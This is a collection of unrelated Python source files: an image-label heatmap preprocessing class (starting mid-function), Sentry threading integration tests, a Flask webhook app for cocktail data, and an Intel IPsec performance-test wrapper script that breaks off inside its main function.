new_y = round(new_square_shape*(point[1]/old_square_shape))
new_label_data[key].append((new_x,new_y))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def zoom_image(self,label_data, img, scale):
all_points = self.get_all_points(label_data)
if len(all_points) == 0:
return label_data, img
bb = cv2.boundingRect(all_points)
x_from = round(bb[0]*scale)
x_to = round(img.shape[1]-((img.shape[1]-(bb[0]+bb[2]))*scale))
y_from = round(bb[1]*scale)
y_to = round(img.shape[0]-((img.shape[0]-(bb[1]+bb[3]))*scale))
img_zoomed = img[y_from:y_to,x_from:x_to,:]
zoomed_label_data = self.adjust_labels_zoomed(label_data,x_from, y_from)
return zoomed_label_data, img_zoomed
def square_image(self,zoomed_label_data, img_zoomed):
all_points = self.get_all_points(zoomed_label_data)
if len(all_points) == 0:
return zoomed_label_data, img_zoomed
orientation = "landscape" if img_zoomed.shape[1] > img_zoomed.shape[0] else "portrait"
crop_v = abs(img_zoomed.shape[1] - img_zoomed.shape[0])
if crop_v < 2:
return zoomed_label_data, img_zoomed
min_v = all_points[:,0].min() if orientation == "landscape" else all_points[:,1].min()
max_v = all_points[:,0].max() if orientation == "landscape" else all_points[:,1].max()
if min_v < ((crop_v/2)+self.__crop_margin):
# cut from HIGH
img_squared = img_zoomed[:,:-crop_v,:] if orientation == "landscape" else img_zoomed[:-crop_v,:,:]
squared_label_data = self.adjust_labels_squared(zoomed_label_data,0,orientation)
elif max_v > img_zoomed.shape[1] - ((crop_v/2)+self.__crop_margin):
# cut LOW
img_squared = img_zoomed[:,crop_v:,:] if orientation == "landscape" else img_zoomed[crop_v:,:,:]
squared_label_data = self.adjust_labels_squared(zoomed_label_data,crop_v,orientation)
else:
# cut from LOW AND HIGH
img_squared = img_zoomed[:,int(crop_v/2):-int(crop_v/2),:] if orientation == "landscape" else img_zoomed[int(crop_v/2):-int(crop_v/2),:,:]
squared_label_data = self.adjust_labels_squared(zoomed_label_data, int(crop_v/2),orientation)
return squared_label_data,img_squared
def size_image(self,squared_label_data, img_squared):
all_points = self.get_all_points(squared_label_data)
if len(all_points) == 0:
img_sized = cv2.resize(img_squared, (self.__target_size, self.__target_size), interpolation = cv2.INTER_CUBIC)
return squared_label_data, img_sized
img_sized = cv2.resize(img_squared, (self.__target_size, self.__target_size), interpolation = cv2.INTER_CUBIC)
sized_label_data = self.adjust_labels_sized(squared_label_data, img_squared.shape[1],self.__target_size)
return sized_label_data,img_sized
def make_point_heat(self,pt, shape, h, initial_itensity = None):
if type(shape) == int:
shape = [shape, shape]
#DEFINE GRID SIZE AND RADIUS(h)
grid_size=1
#FUNCTION TO CALCULATE INTENSITY WITH QUARTIC KERNEL
def kde_quartic(d,h):
dn=d/h
P=(15/16)*(1-dn**2)**2
return P
def kde_linear(d,h):
return 1-(d/h)
#PROCESSING
if initial_itensity is None:
itensity = np.zeros(shape, dtype=np.float32)
else:
itensity = initial_itensity
try:
if pt[1]-h < 0:
h = h - abs(pt[1]-h)
if pt[0]-h < 0:
h = h - abs(pt[0]-h)
if pt[1]+h > shape[0]:
h = h - ((pt[1]+h)-shape[0])
if pt[0]+h > shape[1]:
h = h - ((pt[0]+h)-shape[1])
for x_p in range(pt[1]-h, pt[1]+h):
for y_p in range(pt[0]-h, pt[0]+h):
d=math.sqrt((x_p-pt[1])**2+(y_p-pt[0])**2)
if d<=h:
itensity[x_p,y_p] = kde_linear(d,h)
except:
pdb.set_trace()
print("exception")
return itensity
def get_orth_vektor_from_points(self,P,Q):
return np.array([Q[1] - P[1],P[0] - Q[0]])
def check_neighbors_of_zero_and_interpolate(self,mask,p):
# check neighbors of point in mask of zeroes. Using 4er neighborhood. neighbors with no black pixels interpolate
try:
kernel = np.array([[-1,0],[0,-1],[0,1],[1,0]])
pixels = kernel + p
if len(np.where(mask[pixels[:,0],pixels[:,1]] == 0)[0]) < 2:
mask[p[0],p[1]] = np.mean(mask[pixels[:,0],pixels[:,1]]).round(2)
except:
pass
def fill_holes(self,orth_lines, mask):
# get boundaries of line segment
if len(orth_lines) == 0:
return
boundaries = np.where(orth_lines[:,2] == 0)[0]
if len(boundaries) < 4:
return
boundaries = boundaries[[0,1,-2,-1]]
x_min = orth_lines[boundaries][:,0].astype(np.int).min()
x_max = orth_lines[boundaries][:,0].astype(np.int).max()
y_min = orth_lines[boundaries][:,1].astype(np.int).min()
y_max = orth_lines[boundaries][:,1].astype(np.int).max()
x_min = x_min if x_min >0 else 1
x_max = x_max if x_max<mask.shape[1]-2 else mask.shape[1]-3
y_min = y_min if y_min >0 else 1
y_max = y_max if y_max<mask.shape[0]-2 else mask.shape[0]-3
# get black pixels in segment
mask_t = np.copy(mask[y_min-1:y_max+2,x_min-1:x_max+2])
mask_t[[0,-1],:] = 1
mask_t[:,[0,-1]] = 1
# get black pixels
black_pixels = np.array(np.where(mask_t == 0)).T
# check wether pixel is surrounded of non black pixels and interpolate
# TODO MAKE FAST
for black_pixel in black_pixels:
self.check_neighbors_of_zero_and_interpolate(mask[y_min-1:y_max+2,x_min-1:x_max+2],black_pixel)
def make_line_heat(self,p1,p2, mask, heat_radius):
#try:
discrete_line = np.array(list(zip(*line(*p1, *p2))))
orth_vector = self.get_orth_vektor_from_points(p1,p2)
if np.sqrt(np.sum(orth_vector**2)) == 0.0:
return mask
orth_vector_new_length = ((heat_radius/np.sqrt(np.sum(orth_vector**2)))*orth_vector).round().astype(np.int)
discrete_line, orth_vector_new_length
orth_lines = []
# TODO MAKE FAST
for line_p in discrete_line:
orth_line = np.array(list(zip(*line(*line_p, *(line_p+orth_vector_new_length)))))
orth_lines.append(np.concatenate((orth_line,np.linspace(1,0,len(orth_line))[:,None]),axis=1))
orth_line = np.array(list(zip(*line(*line_p, *(line_p-orth_vector_new_length)))))
orth_lines.append(np.concatenate((orth_line,np.linspace(1,0,len(orth_line))[:,None]),axis=1))
orth_lines = np.vstack(orth_lines)
aa = orth_lines[:,0:2] > -1
bb = orth_lines[:,0:2] < mask.shape[0]
valid_idx = np.logical_and(np.logical_and(aa[:,0], aa[:,1]), np.logical_and(bb[:,0], bb[:,1]))
mask[orth_lines[valid_idx,1].astype(np.int),orth_lines[valid_idx,0].astype(np.int)] = orth_lines[valid_idx,2]
kernel = np.ones((3,3),np.uint8)
dilation = cv2.dilate(mask,kernel,iterations = 3)
close = cv2.erode(dilation,kernel,iterations = 3)
return close
#self.fill_holes(orth_lines[valid_idx], mask)
#except:
#pdb.set_trace()
def make_polygonal_heatmap(self,points, close, heat_radius):
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.float)
if len(points) == 0:
return heatmap.astype(np.uint8)
for s in np.arange(1,len(points)):
p1 = np.array([points[s-1][0], points[s-1][1]]).round().astype(np.int)
p2 = np.array([points[s][0], points[s][1]]).round().astype(np.int)
'''
if (p1[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p1[1]+(heat_radius*2)>heatmap.shape[0]-1) or (p2[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p2[1]+(heat_radius*2)>heatmap.shape[0]-1):
continue
if (p1[0]-(heat_radius*2)<0) or (p1[1]-(heat_radius*2)<0) or (p2[0]-(heat_radius*2)<0) or (p2[1]-(heat_radius*2)<0):
continue
'''
heatmap = self.make_line_heat(p1,p2,heatmap, heat_radius)
if close:
p1 = np.array([points[-1][0], points[-1][1]]).round().astype(np.int)
p2 = np.array([points[0][0], points[0][1]]).round().astype(np.int)
'''
if (p1[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p1[1]+(heat_radius*2)>heatmap.shape[0]-1) or (p2[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p2[1]+(heat_radius*2)>heatmap.shape[0]-1):
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
else:
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
if (p1[0]-(heat_radius*2)<0) or (p1[1]-(heat_radius*2)<0) or (p2[0]-(heat_radius*2)<0) or (p2[1]-(heat_radius*2)<0):
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
else:
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
'''
heatmap = self.make_line_heat(p1,p2,heatmap, heat_radius)
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
def make_points_heatmap(self,points, heat_radius):
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.float32)
if len(points) == 0:
return heatmap.astype(np.uint8)
for pt in points:
heatmap = self.make_point_heat([pt[0], pt[1]],self.__target_size, heat_radius, heatmap)
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
def write_image(self,img,path,file, is_gray=False):
if not is_gray:
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
return cv2.imwrite(str(path/file), img)
def check_label(self,label_data):
for key in label_data.keys():
if len(label_data[key]) == 0:
return True
if label_data[key].min() < 0:
return False
return True
def new_process(self,labels):
dilate_kernel = np.ones((5,5),np.uint8)
count = len(labels)
pbar = progress_bar(range(len(labels)))
for idx in pbar:
label = labels[idx]
# get labels
label_data,label_types, heat_radiuses = get_labels(label, self.__features)
if not self.check_label(label_data):
continue
# get file name TODO: set file name to extern function
file = self.__file_name_function(label, self.__image_ext)
#if file == "2020-11-11_15-44-39.584.png":
#pdb.set_trace()
# load image and convert to rgb
filen = self.__root_path/self.__img_path/file
if not filen.exists():
continue
#pdb.set_trace()
print(filen)
img = cv2.imread(str(filen))
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
for scale in self.__scales:
try:
sized_image_file = file[:file.find("."+self.__image_ext)]+"_sized_"+str(scale)+".png"
#zoom images
zoomed_label_data, img_zoomed = self.zoom_image(label_data,img, scale)
# square images
squared_label_data,img_squared = self.square_image(zoomed_label_data, img_zoomed)
# size images
#try:
sized_label_data,img_sized = self.size_image(squared_label_data, img_squared)
#except:
#pdb.set_trace()
except:
print("Skip", file)
continue
# make heatmaps
heatmaps = []
for asset_key in sized_label_data.keys():
points = sized_label_data[asset_key]
#if (filen.stem == "10IF56K7_top") and (asset_key == "T11"):
#pdb.set_trace()
if len(points) > 0:
if (label_types[asset_key] == "polygon"):
heatmap = self.make_polygonal_heatmap(points,True, heat_radiuses[asset_key])
elif (label_types[asset_key] == "line"):
heatmap = self.make_polygonal_heatmap(points,False, heat_radiuses[asset_key])
elif label_types[asset_key] == "point":
heatmap = self.make_points_heatmap(points, heat_radiuses[asset_key])
else:
raise("label_type `"+label_types[asset_key]+"` not implemented yet.")
else:
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.uint8)
if heatmap.min() == 255:
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.uint8)
self.write_image(heatmap,self.__root_path/asset_key, sized_image_file, is_gray=True)
# make mask
mask = heatmap>0
if mask.max() == False:
interpolated = np.zeros((mask.shape[0],mask.shape[1]), dtype=np.uint8)
else:
dilated = cv2.dilate(mask.astype(np.uint8),dilate_kernel,iterations = self.mask_dilation)
interpolated = np.round(np.interp(dilated, (dilated.min(), dilated.max()), (0, 255))).astype(np.uint8)
self.write_image(interpolated,self.__root_path/asset_key, Path(sized_image_file).stem + "_mask.png", is_gray=True)
if asset_key in self.__convex_hull_features:
heatmaps.append(heatmap)
# make convex hull
if len(heatmaps) > 0:
#if filen.stem == "10IF56K7_top":
#pdb.set_trace()
combined_mask = np.logical_or.reduce(np.stack(heatmaps))
if combined_mask.max() == False:
interpolated = np.zeros((combined_mask.shape[0],combined_mask.shape[1]), dtype=np.uint8)
else:
hull = convex_hull_image(combined_mask)
dilated = cv2.dilate(hull.astype(np.uint8),dilate_kernel,iterations = 3)
interpolated = np.round(np.interp(dilated, (dilated.min(), dilated.max()), (0, 255))).astype(np.uint8)
self.write_image(interpolated,self.__root_path/self.__hull_path, sized_image_file, is_gray=True)
# paint images
if self.__painted_images_path is not None:
img_sized_paint = img_sized.copy()
for key in sized_label_data.keys():
points = sized_label_data[key]
for pt in points:
img_sized_paint = cv2.circle(img_sized_paint, tuple(pt),1,(255,0,0),2)
self.write_image(img_sized_paint,self.__root_path/self.__painted_images_path, sized_image_file, is_gray=False)
# save final image
if self.__save_output_img:
if self.__process_output_image is not None:
img_sized = self.__process_output_image(img_sized, sized_image_file)
self.write_image(img_sized, self.__root_path/self.__final_images_path, sized_image_file, is_gray=True)
else:
self.write_image(img_sized, self.__root_path/self.__final_images_path, sized_image_file, is_gray=False)
pbar.comment = sized_image_file
#print("saved heatmaps and final image", idx+1,"from", count, sized_image_file, end="\r")
|
test_threading.py
|
import gc
from threading import Thread
import pytest
from sentry_sdk import configure_scope, capture_message
from sentry_sdk.integrations.threading import ThreadingIntegration
@pytest.mark.parametrize("integrations", [[ThreadingIntegration()], []])
def test_handles_exceptions(sentry_init, capture_events, integrations):
sentry_init(default_integrations=False, integrations=integrations)
events = capture_events()
def crash():
1 / 0
t = Thread(target=crash)
t.start()
t.join()
if integrations:
event, = events
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"] == {"type": "threading", "handled": False}
else:
assert not events
@pytest.mark.parametrize("propagate_hub", (True, False))
def test_propagates_hub(sentry_init, capture_events, propagate_hub):
sentry_init(
default_integrations=False,
integrations=[ThreadingIntegration(propagate_hub=propagate_hub)],
)
events = capture_events()
def stage1():
with configure_scope() as scope:
scope.set_tag("stage1", True)
t = Thread(target=stage2)
t.start()
t.join()
def stage2():
1 / 0
t = Thread(target=stage1)
t.start()
t.join()
event, = events
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"] == {"type": "threading", "handled": False}
if propagate_hub:
assert event["tags"]["stage1"] is True
else:
assert "stage1" not in event.get("tags", {})
def test_circular_references(sentry_init, request):
sentry_init(default_integrations=False, integrations=[ThreadingIntegration()])
gc.collect()
gc.disable()
request.addfinalizer(gc.enable)
class MyThread(Thread):
def run(self):
pass
t = MyThread()
t.start()
t.join()
del t
assert not gc.collect()
def test_double_patching(sentry_init, capture_events):
sentry_init(default_integrations=False, integrations=[ThreadingIntegration()])
events = capture_events()
# XXX: Workaround for race condition in the py library's magic import
# system (py is a dependency of pytest)
capture_message("hi")
del events[:]
class MyThread(Thread):
def run(self):
1 / 0
ts = []
for _ in range(10):
t = MyThread()
t.start()
ts.append(t)
for t in ts:
t.join()
assert len(events) == 10
for event in events:
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
|
app.py
|
#!flask/bin/python
import os
import datetime
import logging
import json
from threading import Thread
from typing import Dict
import requests
from dotenv import load_dotenv
from flask import Flask, request, abort, jsonify
from querry_sender import try_send_querry_data
from email_sender import send_mail
from database import DatabaseHandler
from helper import generate_headers_and_urls
load_dotenv()
app = Flask(__name__)
logging.basicConfig(level=logging.INFO)
@app.route("/")
def welcome():
return jsonify({"status": "api working"})
@app.route("/hookhandler/cocktail", methods=["POST"])
def post_cocktail_hook():
def post_to_hook(url: str, payload: str, headers: Dict, send_querry: bool):
try:
req = requests.post(url, data=payload, headers=headers)
app.logger.info(f"{req.status_code}: Posted to {url} with payload: {payload}")
# Check if there is still querries data which was not send previously
# Needs to be specified to send, since multiple threads would cause double sending
if send_querry:
try_send_querry_data(app)
except requests.exceptions.ConnectionError:
app.logger.error(f"Could not connect to {url} for the cocktail data!")
db_handler = DatabaseHandler()
db_handler.save_failed_post(payload, url)
# pylint: disable=broad-except
except Exception as err:
app.logger.error(f"Some other error occured: {err}")
if not request.json or "cocktailname" not in request.json:
abort(400)
cocktail = {
"cocktailname": request.json["cocktailname"],
"volume": request.json["volume"],
"machinename": request.json["machinename"],
"countrycode": request.json["countrycode"],
"makedate": datetime.datetime.now().strftime("%d/%m/%Y, %H:%M"),
}
headers, urls = generate_headers_and_urls()
payload = json.dumps(cocktail)
for pos, url in enumerate(urls):
send_querry = pos == 0
thread = Thread(target=post_to_hook, args=(url, payload, headers, send_querry,))
thread.start()
return jsonify({"text": "Post to cocktail webhook started"}), 201
@app.route("/email", methods=["POST"])
def post_file_with_mail():
data_file = request.files["upload_file"]
text = send_mail(data_file.filename, data_file)
app.logger.info(text)
return jsonify({"text": text}), 200
if __name__ == "__main__":
try_send_querry_data(app)
app.run(host="0.0.0.0", port=os.getenv("PORT"))
|
ipsec_perf_tool.py
|
#!/usr/bin/env python3
"""
**********************************************************************
Copyright(c) 2021, Intel Corporation All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********************************************************************
"""
import threading
import queue
import os
import sys
import subprocess
import platform
import time
import argparse
import textwrap
# number of variants to run
TOTAL_VARIANTS = 0
# dictionary to store env vars
ENVS = None
# queues to store todo and completed variants
TODO_Q = None
DONE_Q = None
# don't output info to stderr if set
QUIET = False
# perf application name
PERF_APP = ''
# exit on error flag
EXIT_ERROR = False
class Variant:
"""Class to setup and run test case variant"""
def __init__(self, idx=None, arch=None, direction='encrypt', cipher_alg=None,
hash_alg=None, aead_alg=None, sizes=None, offset=None,
cold_cache=False, shani_off=False, gcm_job_api=False,
unhalted_cycles=False, quick_test=False, smoke_test=False,
imix=None, aad_size=None, job_iter=None):
"""Build perf app command line"""
global PERF_APP
self.idx = idx
self.arch = arch
self.direction = direction
self.cipher_alg = cipher_alg
self.hash_alg = hash_alg
self.aead_alg = aead_alg
self.sizes = sizes
self.offset = offset
self.cmd = '{} --no-progress-bar '.format(PERF_APP)
self.cmd_output = ''
self.out = []
self.core = None
self.cold_cache = cold_cache
self.shani_off = shani_off
self.gcm_job_api = gcm_job_api
self.unhalted_cycles = unhalted_cycles
self.quick_test = quick_test
self.smoke_test = smoke_test
self.imix = imix
self.aad_size = aad_size
self.job_iter = job_iter
if self.arch is not None:
self.cmd += ' --arch {}'.format(self.arch)
if self.offset is not None:
self.cmd += ' -o {}'.format(self.offset)
if self.aead_alg is not None:
if self.cipher_alg is not None or \
self.hash_alg is not None:
print("Invalid combination: aead + cipher / hash", \
file=sys.stderr)
sys.exit(1)
self.cmd += ' --aead-algo {}'.format(self.aead_alg)
if self.cipher_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + cipher", file=sys.stderr)
sys.exit(1)
self.cmd += ' --cipher-algo {}'.format(self.cipher_alg)
if self.hash_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + hash", file=sys.stderr)
sys.exit(1)
self.cmd += ' --hash-algo {}'.format(self.hash_alg)
if self.cipher_alg is not None or \
self.aead_alg is not None:
self.cmd += ' --cipher-dir {}'.format(self.direction)
if self.sizes is not None:
self.cmd += ' --job-size {}'.format(self.sizes)
if self.cold_cache is True:
self.cmd += ' -c'
if self.shani_off is True:
self.cmd += ' --shani-off'
if self.gcm_job_api is True:
self.cmd += ' --gcm-job-api'
if self.unhalted_cycles is True:
self.cmd += ' --unhalted-cycles'
if self.quick_test is True:
self.cmd += ' --quick'
if self.smoke_test is True:
self.cmd += ' --smoke'
if self.imix is not None:
self.cmd += ' --imix {}'.format(self.imix)
if self.aad_size is not None:
self.cmd += ' --aad-size {}'.format(self.aad_size)
if self.job_iter is not None:
self.cmd += ' --job-iter {}'.format(self.job_iter)
def run(self):
"""Run perf app and store output"""
try:
self.cmd_output = \
subprocess.run(self.cmd.split(), \
stdout=subprocess.PIPE, \
stderr=subprocess.PIPE, \
env=ENVS, check=True).stdout.decode('utf-8')
return True
except:
# on error - re-run and store stderr output
self.cmd_output = \
subprocess.run(self.cmd.split(), \
stderr=subprocess.PIPE, \
env=ENVS).stderr.decode('utf-8')
return False
def set_core(self, core):
"""Set core to run perf app on"""
self.core = core
mask = 1 << core
self.cmd += ' --cores {}'.format(str(hex(mask)))
def get_output(self):
"""Get output from run"""
return self.cmd_output
def get_cmd(self):
"""Get variant command line"""
return self.cmd
def get_idx(self):
"""Get assigned index"""
return self.idx
def get_info(self):
"""Get variant details"""
if self.idx is None:
idx = ''
else:
idx = self.idx
if self.cipher_alg is None:
cipher_alg = ''
else:
cipher_alg = self.cipher_alg
if self.hash_alg is None:
hash_alg = ''
elif cipher_alg == '':
hash_alg = self.hash_alg
else:
hash_alg = ' + ' + self.hash_alg
if self.aead_alg is None:
aead_alg = ''
else:
aead_alg = self.aead_alg
if self.core is None:
core = ''
else:
core = self.core
if self.direction is None:
direction = 'n/a'
else:
direction = self.direction
alg = '{}{}{}'.format(cipher_alg, hash_alg, aead_alg)
info = '{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format(idx, core, self.arch, direction, alg)
return info
def init_global_vars():
"""Initialize global variables"""
global TOTAL_VARIANTS
global ENVS
global TODO_Q
global DONE_Q
global QUIET
global PERF_APP
# init vars
TOTAL_VARIANTS = 0
QUIET = False
# include perf directory in PATH
path = '{}:{}'.format(os.getenv('PATH'), os.getenv('PWD'))
# set LD_LIBRARY_PATH if not already set
lib_path = os.getenv('LD_LIBRARY_PATH')
if lib_path is None:
lib_path = '../lib'
# create env vars dictionary to pass to subprocess module
ENVS = {'PATH' : path, 'LD_LIBRARY_PATH' : lib_path}
# init queues to store todo and completed variants
TODO_Q = queue.Queue()
DONE_Q = queue.Queue()
# detect OS and select app name
if platform.system() == 'Windows':
PERF_APP = 'ipsec_perf.exe'
else:
PERF_APP = 'ipsec_perf'
def get_info():
"""get system and app info from perf app output"""
global PERF_APP
archs = None
best_arch = None
cipher_algos = None
hash_algos = None
aead_algos = None
cmd = [PERF_APP, '--print-info'.format(type) ]
output = subprocess.run(cmd, stdout=subprocess.PIPE, \
stderr=subprocess.PIPE, \
env=ENVS, check=True).stdout.decode('utf-8')
lines = output.rstrip().split('\n')
try:
for line in lines:
info = line.split(':')
if info[0] == 'Supported architectures':
archs = info[1].split()
if info[0] == 'Best architecture':
best_arch = info[1].split()
if info[0] == 'Supported cipher algorithms':
cipher_algos = info[1].split()
if info[0] == 'Supported hash algorithms':
hash_algos = info[1].split()
if info[0] == 'Supported aead algorithms':
aead_algos = info[1].split()
except:
print("Error parsing --print-info output:\n" \
"{}".format(output), file=sys.stderr)
if archs is None or best_arch is None or cipher_algos is None \
or hash_algos is None or aead_algos is None:
print("Error parsing system and app information", file=sys.stderr)
sys.exit(1)
return archs, best_arch, cipher_algos, hash_algos, aead_algos
def parse_cores(core_str):
"""Parse core list passed through command line"""
cores = []
# remove spaces
core_str.replace(" ", "")
# check if not a range
if '-' not in core_str:
return list(map(int, core_str.strip().split(',')))
# parse range e.g. 2-8
core_str = core_str.strip().split('-')
for i in range(int(core_str[0]), int(core_str[1]) + 1):
cores.append(i)
return cores
def parse_results(variants):
"""Parse output of perf app for variant"""
out = []
# set header
lines = variants[0].get_output().split('\n')
for line in lines[:-1]:
out.append(line.split('\t')[0])
# append output for all variants to single list
for var in variants:
lines = var.get_output().split('\n')
for i in range(0, len(lines) - 1):
out[i] += '\t{}'.format(lines[i].split()[1])
return out
def parse_args():
"""Parse command line arguments"""
global QUIET
cores = None
directions = ['encrypt', 'decrypt']
offset = 24
alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
description="Wrapper script for the ipsec-mb " \
"performance application enabling extended functionality")
# parse and validate args
parser.add_argument("-a", "--arch", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],
default=None, action='append',
help="set architecture to test (default tests all supported archs)")
parser.add_argument("-c", "--cores", default=cores,
help="list/range of cores e.g. 2-8 or 3,4,5")
parser.add_argument("-d", "--direction", default=None,
choices=directions, help="Cipher direction")
parser.add_argument("-o", "--offset", default=offset, type=int,
help="offset for the SHA size increment, default is 24")
parser.add_argument("-t", "--alg-type", default=None, action='append', choices=alg_types,
help="algorithm types to test")
parser.add_argument("-s", "--job-size", default=None,
help=textwrap.dedent('''\
size of the cipher & hash job in bytes.
It can be:
- single value: test single size
- list: test multiple sizes separated by commas
- range: test multiple sizes with following format
min:step:max (e.g. 16:16:256)\n'''))
parser.add_argument("-q", "--quiet", default=False, action='store_true',
help="disable verbose output")
parser.add_argument("--cold-cache", default=False, action='store_true',
help="use cold cache, it uses warm as default")
parser.add_argument("--arch-best", action='store_true',
help="detect available architectures and run only on the best one")
parser.add_argument("--shani-off", action='store_true', help="don't use SHA extensions")
parser.add_argument("--gcm-job-api", action='store_true',
help="use JOB API for GCM perf tests (raw GCM API is default)")
parser.add_argument("--unhalted-cycles", action='store_true',
help=textwrap.dedent('''\
measure using unhalted cycles (requires root).
Note: RDTSC is used by default'''))
parser.add_argument("--quick", action='store_true',
help=textwrap.dedent('''\
reduces number of test iterations by x10
(less precise but quicker)'''))
parser.add_argument("--smoke", action='store_true',
help=textwrap.dedent('''\
very quick, imprecise and without print out
(for validation only)'''))
parser.add_argument("--imix", default=None,
help=textwrap.dedent('''\
set numbers that establish occurrence proportions between packet sizes.
It requires a list of sizes through --job-size.
(e.g. --imix 4,6 --job-size 64,128 will generate
a series of job sizes where on average 4 out of 10
packets will be 64B long and 6 out of 10 packets
will be 128B long)'''))
parser.add_argument("--aad-size", default=None, type=int,
help="size of AAD for AEAD algorithms")
parser.add_argument("--job-iter", default=None, type=int,
help="number of tests iterations for each job size")
args = parser.parse_args()
# validate and convert values where necessary
if args.arch is not None and args.arch_best is True:
print("{}: error: argument -a/--arch cannot be used with " \
"--arch-best".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.cores is not None:
try:
cores = parse_cores(args.cores)
except:
print("{}: error: argument -c/--cores: invalid value " \
"{}".format(sys.argv[0], args.cores), file=sys.stderr)
sys.exit(1)
if args.imix is not None and args.job_size is None:
print("{}: error: argument --imix must be used with " \
"--job-size".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.alg_type is not None:
alg_types = args.alg_type
else:
# strip all cipher hash combinations in default run
alg_types = alg_types[:-1]
if args.direction is not None:
directions = [args.direction]
if args.quiet is True:
QUIET = True
return args.arch, cores, directions, args.offset, \
alg_types, args.job_size, args.cold_cache, args.arch_best, \
args.shani_off, args.gcm_job_api, args.unhalted_cycles, \
args.quick, args.smoke, args.imix, \
args.aad_size, args.job_iter
def run_test(core=None):
"""
Main processing thread function
1. Dequeue variants from todo queue until empty
2. Run performance test for variant
3. Place completed variants in completed (done) queue
"""
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
while TODO_Q.empty() is False:
variant = TODO_Q.get()
# skip if error encountered
if EXIT_ERROR is True:
if QUIET is False:
print('{} {}'.format(variant.get_info(), '...skipped'), file=sys.stderr)
TODO_Q.task_done()
continue
# set core if specified
if core is not None:
variant.set_core(core)
# print variant information
if QUIET is False:
print(variant.get_info(), file=sys.stderr)
# run variant
if variant.run() is False:
print('Error encountered running: {}\nOutput:\n{}'\
.format(variant.get_cmd(),
variant.get_output()),
file=sys.stderr)
EXIT_ERROR = True
DONE_Q.put(variant)
TODO_Q.task_done()
def main():
"""
Main function to:
- parse command line args
- generate and enqueue list of variants to run
- schedule variants across selected cores
- post process results and print to stdout
"""
global TOTAL_VARIANTS
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
header = '\n{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format('NO', 'CORE', 'ARCH', 'DIR', 'ALG')
result = [] # list to store parsed results
# init global vars
init_global_vars()
supported_archs, best_arch, cipher_algos, hash_algos, aead_algos = get_info()
# parse command line args
archs, cores, directions, offset, alg_types, sizes, cold_cache, arch_best, \
shani_off, gcm_job_api, unhalted_cycles, quick_test, smoke_test, \
imix, aad_size, job_iter = parse_args()
# validate requested archs are supported
if arch_best is True:
archs = best_arch
elif archs is None:
archs = supported_archs
else:
for arch in archs:
if arch not in supported_archs:
print('Error: {} arch not supported!'.format(arch), file=sys.stderr)
sys.exit(1)
# print args
if QUIET is False:
print('Testing:', file=sys.stderr)
print(' Architectures: {}'.format(archs), file=sys.stderr)
print(' Algorithms: {}'.format(alg_types), file=sys.stderr)
print(' Directions: {}'.format(directions), file=sys.stderr)
if offset is not None:
print(' Offset: {}'.format(offset), file=sys.stderr)
if aad_size is not None:
print(' AAD size: {}'.format(aad_size), file=sys.stderr)
if sizes is not None:
print(' Sizes: {}'.format(sizes), file=sys.stderr)
if imix is not None:
print(' IMIX: {}'.format(imix), file=sys.stderr)
if cores is not None:
print(' Cores: {}'.format(cores), file=sys.stderr)
